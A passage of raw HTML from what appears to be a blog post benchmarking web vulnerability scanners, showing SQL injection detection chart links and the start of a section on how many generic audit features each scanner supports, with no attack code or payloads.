&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50Ntun8aCl-z4IJEqsF6kvlTMySI-Uec-EzcIFAjf6-931K3MR20-Cj1isbkPArabqJPVjfnDWLjtamUNtsVzHcbDUuqe6DlNgS7FKTqYX_Vky3w51nHT1V5URuHxlQfo-Qhpay3aF_g/s1600/%252823%2529+Test+8-+Opensource+-+SQL+Injection.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi50Ntun8aCl-z4IJEqsF6kvlTMySI-Uec-EzcIFAjf6-931K3MR20-Cj1isbkPArabqJPVjfnDWLjtamUNtsVzHcbDUuqe6DlNgS7FKTqYX_Vky3w51nHT1V5URuHxlQfo-Qhpay3aF_g/s1600/%252823%2529+Test+8-+Opensource+-+SQL+Injection.png&quot; height=&quot;594&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The SQL Injection Detection Accuracy of Scanners – Unified
List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_40&quot;
 o:spid=&quot;_x0000_i1035&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:344.25pt;height:696.75pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image062.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihXylx_RBQbatcZbLrIB4IZbp1wwokQgH_zlNK1zo7m81aS5RKNJNG_4UPqeJA2iva4x8TuK1rSfdE4pwofO8BrYYewEtKCYYOzWzmp5veqLliJHgaRkGIfvwb0_isvzCcU2UnhE_RVX8/s1600/%252824%2529+Test+8-+Unified+-+SQL+Injection.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihXylx_RBQbatcZbLrIB4IZbp1wwokQgH_zlNK1zo7m81aS5RKNJNG_4UPqeJA2iva4x8TuK1rSfdE4pwofO8BrYYewEtKCYYOzWzmp5veqLliJHgaRkGIfvwb0_isvzCcU2UnhE_RVX8/s1600/%252824%2529+Test+8-+Unified+-+SQL+Injection.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;16. Test IX - Attack Vector Support&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;The ninth assessment criterion is the &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;number&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; of &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;audit
features&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; each tool supports.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For the purpose of the benchmark, an audit feature was
defined as a &lt;b&gt;common&lt;/b&gt; &lt;b&gt;generic application-level &lt;/b&gt;scanning feature,
supporting the detection of exposures which could be used to attack the tested
web application, gain access to sensitive assets or attack legitimate clients.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The definition of the assessment criterion rules out product
specific exposures and infrastructure related vulnerabilities, while unique and
extremely rare features were documented and presented in a different section of
this research, and were not taken into account when calculating the results. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Reasoning&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:
An automated tool can&#39;t detect an exposure without a code module designed to
identify the issue, and therefore, the number of audit features &lt;b&gt;will affect
the type (and amount) of exposures&lt;/b&gt; that the tool will be able to detect
(assuming the audit features are &lt;b&gt;&lt;i&gt;implemented properly&lt;/i&gt;&lt;/b&gt;, that
vulnerable &lt;b&gt;&lt;i&gt;entry points will be detected&lt;/i&gt;&lt;/b&gt;, that the tool will be
able to handle the relevant &lt;b&gt;scan barriers&lt;/b&gt; and &lt;b&gt;scanning perquisites&lt;/b&gt;,
and that the tool will &lt;b&gt;&lt;i&gt;manage to scan the vulnerable input vectors&lt;/i&gt;&lt;/b&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although I typically place the assessment of &lt;b&gt;supported
audit features&lt;/b&gt; in a position of higher importance in the benchmark, my
current research led me to make some changes.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I still consider the amount of supported generic
vulnerability detection features (a.k.a &lt;b&gt;audit plugins&lt;/b&gt;) to be &lt;b&gt;a very
significant&lt;/b&gt; &lt;b&gt;aspect&lt;/b&gt;, probably more than I ever did.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Unfortunately, I came to the conclusion the current list
that the WAVSEP project documents is like a &lt;b&gt;drop in the ocean&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP currently contains information on which scanners
  are &lt;b&gt;relatively&lt;/b&gt; more audit-feature rich – &lt;b&gt;relative&lt;/b&gt;, as in
  relation to other projects, not to the actual variety of attacks out there. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although &quot;&lt;b&gt;relative&lt;/b&gt;&quot; may still be very
  useful to the consumer, in my opinion, it&#39;s not as useful to the industry as
  I had hoped.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Originally, when I created the list of supported audit
  plugins which is currently used (and covers &lt;b&gt;32 attack&lt;/b&gt; categories at
  the moment), I composed it from the list of plugins that were &lt;b&gt;commonly supported&lt;/b&gt;
  by scanners &lt;b&gt;at the time &lt;/b&gt;(2009-2010).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although the list was somehow limited, and by no means
  representative to the overall list of attacks that scanners &lt;b&gt;should detect&lt;/b&gt;
  (and hopefully would one day be able to detect), it was enough to &lt;b&gt;represent&lt;/b&gt;
  the &lt;b&gt;differences&lt;/b&gt; between the products.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 16.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Five years passed – and many things changed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Numerous &lt;b&gt;new generic application-level&lt;/b&gt; &lt;b&gt;attacks&lt;/b&gt;
  were invented, published or re-classified.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Projects like &lt;a href=&quot;https://cwe.mitre.org/&quot;&gt;CWE&lt;/a&gt;, &lt;a href=&quot;http://capec.mitre.org/&quot;&gt;CAPEC&lt;/a&gt;, &lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Testing_Project&quot;&gt;OWASP Testing
  Guide&lt;/a&gt;, &lt;a href=&quot;https://www.owasp.org/index.php/Category:Attack&quot;&gt;Attacks&lt;/a&gt;
  and&amp;nbsp;&lt;a href=&quot;https://www.owasp.org/index.php/Category:Vulnerability&quot;&gt;Vulnerabilities&lt;/a&gt;,
  &lt;a href=&quot;http://projects.webappsec.org/w/page/13246978/Threat%20Classification&quot;&gt;WASC&lt;/a&gt;
  and &lt;b&gt;others&lt;/b&gt; added more and more &lt;b&gt;attack classifications&lt;/b&gt;, and
  that&#39;s without taking into account the numerous vectors that were published
  in blogs, conferences and competitions, which often didn&#39;t get the attention
  they deserved. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;While the commonly implemented scanning features in
  scanners were usually derived from &lt;b&gt;feature demands&lt;/b&gt;, attack vectors
  receiving higher levels of &quot;&lt;b&gt;popularity&lt;/b&gt;&quot; and &lt;b&gt;publicity&lt;/b&gt;,
  vulnerabilities that the vendors (and to some extent the users) &lt;b&gt;perceived&lt;/b&gt;
  to be the most common or severe, and sometimes some vendor-specific &quot;exotic&quot;
  vectors, there was never any roadmap that will classify to consumers what was
  &lt;b&gt;MORE&lt;/b&gt; important for vendors to support.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;So after figuring that out, prior to the benchmark, I
  decided to expand my list of attacks and vulnerabilities, so I could
  properly map the contribution of the various tools against &lt;b&gt;the overall&lt;/b&gt;
  &lt;b&gt;risk map&lt;/b&gt;, and during the research stages that preceded this
  publication, I started researching which &lt;b&gt;vectors&lt;/b&gt; that&lt;b&gt; scanners can potentially
  identify &lt;/b&gt;actually&lt;b&gt; exist&lt;/b&gt;, and which of those are supported by the
  individual scanners.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Well, it went pretty well…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 16.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In fact, it went so well that &lt;b&gt;so far&lt;/b&gt; I classified &lt;b&gt;227&lt;/b&gt;
  &lt;b&gt;distinct&lt;/b&gt; application &lt;b&gt;attacks&lt;/b&gt;;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;227 attacks, not including multipliers due to
  persistent/session/indirect states, and I&#39;m not even done mapping and
  classifying them.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Needless to say, that&#39;s a lot of mapping tasks for each
  individual product.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In fact, the &lt;b&gt;effort of classifying and prioritizing those
  vectors&lt;/b&gt; while verifying which products supported them was so &lt;b&gt;high&lt;/b&gt;,
  that I had to &lt;b&gt;postpone their publication&lt;/b&gt;, or else the research you are
  currently reading might not have been published any time soon.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;So, at the moment, this section describes &lt;b&gt;the relative&lt;/b&gt;
  support for various audit features, and the rest of the content collected
  during the research will have to wait for another publication. &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The detailed comparison of the scanners support for various
audit features is documented in detail in the following section of
sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/audit-features-comparison-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/audit-features-comparison-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
